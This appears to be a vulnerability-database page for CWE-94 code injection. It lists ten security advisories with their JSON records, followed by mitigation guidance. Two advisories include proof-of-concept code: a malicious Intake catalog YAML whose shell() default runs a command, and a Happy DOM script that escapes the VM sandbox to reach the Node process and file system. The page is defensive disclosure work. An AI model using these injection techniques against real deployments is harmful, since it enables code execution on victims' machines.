Common Weakness Enumeration

CWE-94

Allowed-with-Review

Improper Control of Generation of Code ('Code Injection')

Abstraction: Base · Status: Draft

The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

8319 vulnerabilities reference this CWE, most recent first.

GHSA-373W-8GF3-3HVX

Vulnerability from github – Published: 2022-05-02 03:16 – Updated: 2022-05-02 03:16
VLAI
Details

Microsoft Windows Media Runtime, as used in DirectShow WMA Voice Codec, Windows Media Audio Voice Decoder, and Audio Compression Manager (ACM), does not properly process Advanced Systems Format (ASF) files, which allows remote attackers to execute arbitrary code via a crafted audio file that uses the Windows Media Speech codec, aka "Windows Media Runtime Voice Sample Rate Vulnerability."

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2009-0555"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2009-10-14T10:30:00Z",
    "severity": "HIGH"
  },
  "details": "Microsoft Windows Media Runtime, as used in DirectShow WMA Voice Codec, Windows Media Audio Voice Decoder, and Audio Compression Manager (ACM), does not properly process Advanced Systems Format (ASF) files, which allows remote attackers to execute arbitrary code via a crafted audio file that uses the Windows Media Speech codec, aka \"Windows Media Runtime Voice Sample Rate Vulnerability.\"",
  "id": "GHSA-373w-8gf3-3hvx",
  "modified": "2022-05-02T03:16:36Z",
  "published": "2022-05-02T03:16:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-0555"
    },
    {
      "type": "WEB",
      "url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-051"
    },
    {
      "type": "WEB",
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6407"
    },
    {
      "type": "WEB",
      "url": "http://www.us-cert.gov/cas/techalerts/TA09-286A.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-374C-2PVV-FXF5

Vulnerability from github – Published: 2025-12-10 21:31 – Updated: 2025-12-17 21:30
VLAI
Details

A template injection vulnerability in the /vip/v1/file/save component of ChanCMS v3.3.4 allows attackers to execute arbitrary code via a crafted POST request.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-65602"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1336",
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-12-10T20:16:21Z",
    "severity": "CRITICAL"
  },
  "details": "A template injection vulnerability in the /vip/v1/file/save component of ChanCMS v3.3.4 allows attackers to execute arbitrary code via a crafted POST request.",
  "id": "GHSA-374c-2pvv-fxf5",
  "modified": "2025-12-17T21:30:41Z",
  "published": "2025-12-10T21:31:37Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65602"
    },
    {
      "type": "WEB",
      "url": "https://gitee.com/chancms/ChanCMS"
    },
    {
      "type": "WEB",
      "url": "https://www.notion.so/ChanCMS-Unauthenticated-RCE-2a3ee9235ba380fc9973e16c06258689"
    },
    {
      "type": "WEB",
      "url": "https://www.notion.so/ChanCMS-Unauthenticated-RCE-2a3ee9235ba380fc9973e16c06258689?source=copy_link"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-374C-5PJ4-7V9C

Vulnerability from github – Published: 2022-05-04 00:28 – Updated: 2022-05-04 00:28
VLAI
Details

Microsoft Internet Explorer 6 through 9 allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document that is not properly handled during a "Print table of links" print operation, aka "Print Feature Remote Code Execution Vulnerability."

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2012-0168"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2012-04-10T21:55:00Z",
    "severity": "HIGH"
  },
  "details": "Microsoft Internet Explorer 6 through 9 allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document that is not properly handled during a \"Print table of links\" print operation, aka \"Print Feature Remote Code Execution Vulnerability.\"",
  "id": "GHSA-374c-5pj4-7v9c",
  "modified": "2022-05-04T00:28:30Z",
  "published": "2022-05-04T00:28:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-0168"
    },
    {
      "type": "WEB",
      "url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-023"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/74379"
    },
    {
      "type": "WEB",
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A15577"
    },
    {
      "type": "WEB",
      "url": "http://osvdb.org/81126"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id?1026901"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-377G-GWP8-J5FX

Vulnerability from github – Published: 2026-05-10 15:31 – Updated: 2026-05-10 15:31
VLAI
Details

Aero CMS 0.0.1 contains a PHP code injection vulnerability that allows authenticated attackers to execute arbitrary PHP code by uploading malicious files through the image parameter. Attackers can upload PHP files with embedded code to the admin posts.php endpoint with source=add_post parameter, and the uploaded files are executed by the server.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-50944"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-05-10T13:16:32Z",
    "severity": "HIGH"
  },
  "details": "Aero CMS 0.0.1 contains a PHP code injection vulnerability that allows authenticated attackers to execute arbitrary PHP code by uploading malicious files through the image parameter. Attackers can upload PHP files with embedded code to the admin posts.php endpoint with source=add_post parameter, and the uploaded files are executed by the server.",
  "id": "GHSA-377g-gwp8-j5fx",
  "modified": "2026-05-10T15:31:20Z",
  "published": "2026-05-10T15:31:20Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-50944"
    },
    {
      "type": "WEB",
      "url": "https://github.com/MegaTKC/AeroCMS"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/51085"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/aero-cms-php-code-injection-via-posts-php"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-37G4-QQQV-7M99

Vulnerability from github – Published: 2026-03-19 17:46 – Updated: 2026-03-25 20:52
VLAI
Summary
Intake has a Command Injection via shell() Expansion in Parameter Defaults
Details

Summary

The shell() syntax within parameter default values appears to be automatically expanded during the catalog parsing process. If a catalog contains a parameter default such as shell(), the command may be executed when the catalog source is accessed. This means that if a user loads a malicious catalog YAML, embedded commands could execute on the host system. This behavior could potentially be classified as OS Command Injection / Unsafe Shell Expansion.

Details

The issue appears to originate from how parameter default values are expanded when a catalog source is accessed.

During catalog loading and source access:

Intake resolves parameter default values The function responsible for expanding defaults processes the shell() syntax The shell expression triggers a subprocess execution Because this occurs during catalog evaluation, the command may execute before the user explicitly interacts with the dataset itself.

Affected logic appears to involve:

expand_defaults()

and related parameter parsing mechanisms.

PoC

exploit.yaml

metadata:
  version: 1
sources:
  rce_test:
    driver: csv
    description: "Testing shell expansion in parameters"
    args:
      urlpath: "{{ cmd_exec }}"
    parameters:
      cmd_exec:
        display_name: "Test Parameter"
        type: str
        default: "shell(touch /tmp/intake_rce_test)"

reproduce.py

import intake
import os

PROOF_FILE = "/tmp/intake_rce_test"

if os.path.exists(PROOF_FILE):
    os.remove(PROOF_FILE)

print(f"[*] Proof file exists before: {os.path.exists(PROOF_FILE)}")

try:
    cat = intake.open_catalog("exploit.yaml")

    print("Accessing source...")
    _ = cat["rce_test"]

except Exception as e:
    print(f" Error during execution: {e}")

if os.path.exists(PROOF_FILE):
    print(f" Command execution confirmed, Found: {PROOF_FILE}")
else:
    print("Command execution did not occur.")

Attack Scenario

A potential attack scenario could be:

  1. An attacker publishes a malicious Intake catalog YAML file
  2. The victim downloads or loads the catalog
  3. The victim accesses a source entry in the catalog
  4. Parameter defaults are expanded
  5. The shell() expression triggers execution of the embedded command

Impact

If this behavior is confirmed to be unintended, an attacker could distribute a malicious catalog file via:

  • Git repositories
  • shared datasets
  • URLs
  • data science workflows
  • Any user loading the catalog could unknowingly execute commands with their local user privileges.

Recommendation

Possible mitigations could include:

  • disabling shell() expansion by default
  • requiring an explicit opt-in flag (e.g., allow_shell=True)
  • restricting shell execution for catalogs loaded from untrusted sources Please let me know if additional information or testing is needed. I'm happy to assist with further analysis or validation.
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "intake"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2.0.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33310"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-19T17:46:54Z",
    "nvd_published_at": "2026-03-24T14:16:30Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nThe shell() syntax within parameter default values appears to be automatically expanded during the catalog parsing process.\nIf a catalog contains a parameter default such as shell(\u003ccommand\u003e), the command may be executed when the catalog source is accessed.\nThis means that if a user loads a malicious catalog YAML, embedded commands could execute on the host system.\nThis behavior could potentially be classified as OS Command Injection / Unsafe Shell Expansion.\n\n### Details\nThe issue appears to originate from how parameter default values are expanded when a catalog source is accessed.\n\nDuring catalog loading and source access:\n\nIntake resolves parameter default values\nThe function responsible for expanding defaults processes the shell() syntax\nThe shell expression triggers a subprocess execution\nBecause this occurs during catalog evaluation, the command may execute before the user explicitly interacts with the dataset itself.\n\nAffected logic appears to involve:\n```\nexpand_defaults()\n```\nand related parameter parsing mechanisms.\n\n\n### PoC\nexploit.yaml\n```\nmetadata:\n  version: 1\nsources:\n  rce_test:\n    driver: csv\n    description: \"Testing shell expansion in parameters\"\n    args:\n      urlpath: \"{{ cmd_exec }}\"\n    parameters:\n      cmd_exec:\n        display_name: \"Test Parameter\"\n        type: str\n        default: \"shell(touch /tmp/intake_rce_test)\"\n```\n\nreproduce.py\n```\nimport intake\nimport os\n\nPROOF_FILE = \"/tmp/intake_rce_test\"\n\nif os.path.exists(PROOF_FILE):\n    os.remove(PROOF_FILE)\n\nprint(f\"[*] Proof file exists before: {os.path.exists(PROOF_FILE)}\")\n\ntry:\n    cat = intake.open_catalog(\"exploit.yaml\")\n\n    print(\"Accessing source...\")\n    _ = cat[\"rce_test\"]\n\nexcept Exception as e:\n    print(f\" Error during execution: {e}\")\n\nif os.path.exists(PROOF_FILE):\n    print(f\" Command execution confirmed, Found: {PROOF_FILE}\")\nelse:\n    print(\"Command execution did not occur.\")\n```\n### Attack Scenario\nA potential attack scenario could be:\n\n1. An attacker publishes a malicious Intake catalog YAML file\n2. The victim downloads or loads the catalog\n3. The victim accesses a source entry in the catalog\n4. Parameter defaults are expanded\n5. The shell() expression triggers execution of the embedded command\n\n### Impact\n\nIf this behavior is confirmed to be unintended, an attacker could distribute a malicious catalog file via:\n\n- Git repositories\n- shared datasets\n- URLs\n- data science workflows\n- Any user loading the catalog could unknowingly execute commands with their local user privileges.\n\n### Recommendation\nPossible mitigations could include:\n\n- disabling shell() expansion by default\n- requiring an explicit opt-in flag (e.g., allow_shell=True)\n- restricting shell execution for catalogs loaded from untrusted sources\nPlease let me know if additional information or testing is needed.\nI\u0027m happy to assist with further analysis or validation.",
  "id": "GHSA-37g4-qqqv-7m99",
  "modified": "2026-03-25T20:52:29Z",
  "published": "2026-03-19T17:46:54Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/intake/intake/security/advisories/GHSA-37g4-qqqv-7m99"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33310"
    },
    {
      "type": "WEB",
      "url": "https://github.com/intake/intake/commit/d0c0b6b57c1cb3f73880655ded4a9b0e18e1fd1b"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/intake/intake"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Intake has a Command Injection via shell() Expansion in Parameter Defaults"
}

GHSA-37J7-FG3J-429F

Vulnerability from github – Published: 2025-10-10 23:46 – Updated: 2025-10-13 15:48
VLAI
Summary
Happy DOM: VM Context Escape can lead to Remote Code Execution
Details

Escape of VM Context gives access to process level functionality

Summary

Happy DOM v19 and lower contains a security vulnerability that puts the owner system at the risk of RCE (Remote Code Execution) attacks.

A Node.js VM Context is not an isolated environment, and if the user runs untrusted JavaScript code within the Happy DOM VM Context, it may escape the VM and get access to process level functionality.

It seems like what the attacker can get control over depends on if the process is using ESM or CommonJS. With CommonJS the attacker can get hold of the require() function to import modules.

Happy DOM has JavaScript evaluation enabled by default. This may not be obvious to the consumer of Happy DOM and can potentially put the user at risk if untrusted code is executed within the environment.

Reproduce

CommonJS (Possible to get hold of require)

const { Window } = require('happy-dom');
const window = new Window({ console });

window.document.write(`
  <script>
     const process = this.constructor.constructor('return process')();
     const require = process.mainModule.require;

     console.log('Files:', require('fs').readdirSync('.').slice(0,3));
  </script>
`);

ESM (Not possible to get hold of import or require)

const { Window } = require('happy-dom');
const window = new Window({ console });

window.document.write(`
  <script>
     const process = this.constructor.constructor('return process')();

     console.log('PID:', process.pid);
  </script>
`);

Potential Impact

Server-Side Rendering (SSR)

const { Window } = require('happy-dom');
const window = new Window();
window.document.innerHTML = userControlledHTML;

Testing Frameworks

Any test suite using Happy-DOM with untrusted content may be at risk

Attack Scenarios

  1. Data Exfiltration: Access to environment variables, configuration files, secrets
  2. Lateral Movement: Network access for connecting to internal systems. Happy DOM already gives access to the network by fetch, but has protections in place (such as CORS and header validation etc.).
  3. Code Execution: Child process access for running arbitrary commands
  4. Persistence: File system access

Recommended Immediate Actions

  1. Update Happy DOM to v20 or above
    • This version has JavaScript evaluation disabled by default
    • This version will output a warning if JavaScript is enabled in an insecure environment
  2. Run Node.js with the "--disallow-code-generation-from-strings" if you need JavaScript evaluation enabled
    • This makes sure that evaluation can't be used at process level to escape the VM
    • eval() and Function() can still be used within the Happy DOM VM without any known security risk
    • Happy DOM v20 and above will output a warning if this flag is not in use
  3. If you can't update Happy DOM right now, it's recommended to disable JavaScript evaluation, unless you completely trust the content within the environment

Technical Root Cause

All classes and functions inherit from Function. By walking the constructor chain it's possible to get hold of Function at process level. As Function can evaluate code from strings, it's possible to execute code at process level.

Running Node with the "--disallow-code-generation-from-strings" flag protects against this.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "happy-dom"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "20.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-61927"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-10-10T23:46:42Z",
    "nvd_published_at": "2025-10-10T20:15:38Z",
    "severity": "CRITICAL"
  },
  "details": "# Escape of VM Context gives access to process level functionality\n\n## Summary\nHappy DOM v19 and lower contains a security vulnerability that puts the owner system at the risk of RCE (Remote Code Execution) attacks.\n\nA Node.js VM Context is not an isolated environment, and if the user runs untrusted JavaScript code within the Happy DOM VM Context, it may escape the VM and get access to process level functionality.\n\nIt seems like what the attacker can get control over depends on if the process is using ESM or CommonJS. With CommonJS the attacker can get hold of the `require()` function to import modules.\n\nHappy DOM has JavaScript evaluation enabled by default. This may not be obvious to the consumer of Happy DOM and can potentially put the user at risk if untrusted code is executed within the environment.\n\n## Reproduce\n\n### CommonJS (Possible to get hold of require)\n\n```javascript\nconst { Window } = require(\u0027happy-dom\u0027);\nconst window = new Window({ console });\n\nwindow.document.write(`\n  \u003cscript\u003e\n     const process = this.constructor.constructor(\u0027return process\u0027)();\n     const require = process.mainModule.require;\n  \n     console.log(\u0027Files:\u0027, require(\u0027fs\u0027).readdirSync(\u0027.\u0027).slice(0,3));\n  \u003c/script\u003e\n`);\n```\n### ESM (Not possible to get hold of import or require)\n\n```javascript\nconst { Window } = require(\u0027happy-dom\u0027);\nconst window = new Window({ console });\n\nwindow.document.write(`\n  \u003cscript\u003e\n     const process = this.constructor.constructor(\u0027return process\u0027)();\n  \n     console.log(\u0027PID:\u0027, process.pid);\n  \u003c/script\u003e\n`);\n```\n\n## Potential Impact\n\n#### Server-Side Rendering (SSR)\n```javascript\nconst { Window } = require(\u0027happy-dom\u0027);\nconst window = new Window();\nwindow.document.innerHTML = userControlledHTML;\n```\n\n#### Testing Frameworks\nAny test suite using Happy-DOM with untrusted content may be at risk\n\n## Attack Scenarios\n\n1. **Data Exfiltration**: Access to environment variables, configuration files, secrets\n2. **Lateral Movement**: Network access for connecting to internal systems. Happy DOM already gives access to the network by fetch, but has protections in place (such as CORS and header validation etc.).\n3. **Code Execution**: Child process access for running arbitrary commands\n4. **Persistence**: File system access\n\n## Recommended Immediate Actions\n\n1. Update Happy DOM to v20 or above\n    - This version has JavaScript evaluation disabled by default\n    - This version will output a warning if JavaScript is enabled in an insecure environment\n2. Run Node.js with the \"--disallow-code-generation-from-strings\" if you need JavaScript evaluation enabled\n    - This makes sure that evaluation can\u0027t be used at process level to escape the VM\n    - `eval()` and `Function()` can still be used within the Happy DOM VM without any known security risk\n    - Happy DOM v20 and above will output a warning if this flag is not in use\n4. If you can\u0027t update Happy DOM right now, it\u0027s recommended to disable JavaScript evaluation, unless you completely trust the content within the environment\n\n## Technical Root Cause\n\nAll classes and functions inherit from [Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function). By walking the constructor chain it\u0027s possible to get hold of [Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function) at process level. As [Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function) can evaluate code from strings, it\u0027s possible to execute code at process level.\n\nRunning Node with the \"--disallow-code-generation-from-strings\" flag protects against this.",
  "id": "GHSA-37j7-fg3j-429f",
  "modified": "2025-10-13T15:48:53Z",
  "published": "2025-10-10T23:46:42Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/capricorn86/happy-dom/security/advisories/GHSA-37j7-fg3j-429f"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61927"
    },
    {
      "type": "WEB",
      "url": "https://github.com/capricorn86/happy-dom/commit/819d15ba289495439eda8be360d92a614ce22405"
    },
    {
      "type": "WEB",
      "url": "https://github.com/capricorn86/happy-dom/commit/de438ad72921c69793584aa657b48d3655dfac97"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/capricorn86/happy-dom"
    },
    {
      "type": "WEB",
      "url": "https://github.com/capricorn86/happy-dom/releases/tag/v20.0.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Happy DOM: VM Context Escape can lead to Remote Code Execution"
}

GHSA-37M3-29M6-VGXQ

Vulnerability from github – Published: 2022-05-01 07:40 – Updated: 2022-05-01 07:40
VLAI
Details

PHP remote file inclusion vulnerability in inertianews_main.php in inertianews 0.02 beta allows remote attackers to execute arbitrary PHP code via a URL in the inews_path parameter.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2006-6726"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2006-12-26T21:28:00Z",
    "severity": "HIGH"
  },
  "details": "PHP remote file inclusion vulnerability in inertianews_main.php in inertianews 0.02 beta allows remote attackers to execute arbitrary PHP code via a URL in the inews_path parameter.",
  "id": "GHSA-37m3-29m6-vgxq",
  "modified": "2022-05-01T07:40:48Z",
  "published": "2022-05-01T07:40:48Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2006-6726"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/2976"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/21713"
    },
    {
      "type": "WEB",
      "url": "http://www.vupen.com/english/advisories/2006/5130"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-37PQ-893F-G7Q5

Vulnerability from github – Published: 2025-04-27 21:34 – Updated: 2025-11-05 22:01
VLAI
Summary
Apereo CAS code injection vulnerability
Details

A vulnerability was found in Apereo CAS 5.2.6 and classified as critical. Affected by this issue is the function saveService of the file cas-5.2.6\webapp-mgmt\cas-management-webapp-support\src\main\java\org\apereo\cas\mgmt\services\web\RegisteredServiceSimpleFormController.java of the component Groovy Code Handler. The manipulation leads to code injection. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apereo.cas:cas-management-webapp-support"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "5.2.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-3984"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-74",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-04-28T20:39:01Z",
    "nvd_published_at": "2025-04-27T20:15:15Z",
    "severity": "LOW"
  },
  "details": "A vulnerability was found in Apereo CAS 5.2.6 and classified as critical. Affected by this issue is the function saveService of the file cas-5.2.6\\webapp-mgmt\\cas-management-webapp-support\\src\\main\\java\\org\\apereo\\cas\\mgmt\\services\\web\\RegisteredServiceSimpleFormController.java of the component Groovy Code Handler. The manipulation leads to code injection. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
  "id": "GHSA-37pq-893f-g7q5",
  "modified": "2025-11-05T22:01:03Z",
  "published": "2025-04-27T21:34:47Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3984"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/apereo/cas"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.306320"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.306320"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.557100"
    },
    {
      "type": "WEB",
      "url": "https://wx.mail.qq.com/s?k=ilW4ixcMaVgGU49Dij"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Apereo CAS code injection vulnerability"
}

GHSA-37Q2-9VP4-Q6F4

Vulnerability from github – Published: 2022-05-17 04:30 – Updated: 2022-05-17 04:30
VLAI
Details

Untrusted search path vulnerability in Ghostscript 8.62 allows local users to execute arbitrary PostScript code via a Trojan horse Postscript library file in Encoding/ under the current working directory, a different vulnerability than CVE-2010-2055.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2010-4820"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2014-10-27T01:55:00Z",
    "severity": "MODERATE"
  },
  "details": "Untrusted search path vulnerability in Ghostscript 8.62 allows local users to execute arbitrary PostScript code via a Trojan horse Postscript library file in Encoding/ under the current working directory, a different vulnerability than CVE-2010-2055.",
  "id": "GHSA-37q2-9vp4-q6f4",
  "modified": "2022-05-17T04:30:18Z",
  "published": "2022-05-17T04:30:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-4820"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=599564"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=771853"
    },
    {
      "type": "WEB",
      "url": "http://bugs.ghostscript.com/show_bug.cgi?id=691339"
    },
    {
      "type": "WEB",
      "url": "http://rhn.redhat.com/errata/RHSA-2012-0095.html"
    },
    {
      "type": "WEB",
      "url": "http://rhn.redhat.com/errata/RHSA-2012-0096.html"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2012/01/04/7"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/archive/1/511433"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/51847"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-37RP-RG27-25P2

Vulnerability from github – Published: 2022-05-17 01:22 – Updated: 2022-05-17 01:22
VLAI
Details

"Dokodemo eye Smart HD" SCR02HD Firmware 1.0.3.1000 and earlier allows authenticated attackers to conduct code injection attacks via unspecified vectors.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-10835"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-08-29T01:35:00Z",
    "severity": "HIGH"
  },
  "details": "\"Dokodemo eye Smart HD\" SCR02HD Firmware 1.0.3.1000 and earlier allows authenticated attackers to conduct code injection attacks via unspecified vectors.",
  "id": "GHSA-37rp-rg27-25p2",
  "modified": "2022-05-17T01:22:09Z",
  "published": "2022-05-17T01:22:09Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-10835"
    },
    {
      "type": "WEB",
      "url": "https://jvn.jp/en/jp/JVN87410770/index.html"
    },
    {
      "type": "WEB",
      "url": "http://www.nippon-antenna.co.jp/product/ine/pdf/scr02hd_about_security.pdf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design

Strategy: Refactoring

Refactor your program so that you do not have to dynamically generate code.

Mitigation
Architecture and Design
  • Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product.
  • Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection.
  • This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.
  • Be careful to avoid CWE-243 and other weaknesses related to jails.
Mitigation MIT-5
Implementation

Strategy: Input Validation

  • Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
  • Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
  • To reduce the likelihood of code injection, use stringent allowlists that limit which constructs are allowed. If you are dynamically constructing code that invokes a function, then verifying that the input is alphanumeric might be insufficient. An attacker might still be able to reference a dangerous function that you did not intend to allow, such as system(), exec(), or exit().
Mitigation
Testing

Use dynamic tools and techniques that interact with the product using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The product's operation may slow down, but it should not become unstable, crash, or generate incorrect results.

Mitigation MIT-32
Operation

Strategy: Compilation or Build Hardening

Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).

Mitigation MIT-32
Operation

Strategy: Environment Hardening

Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).

Mitigation
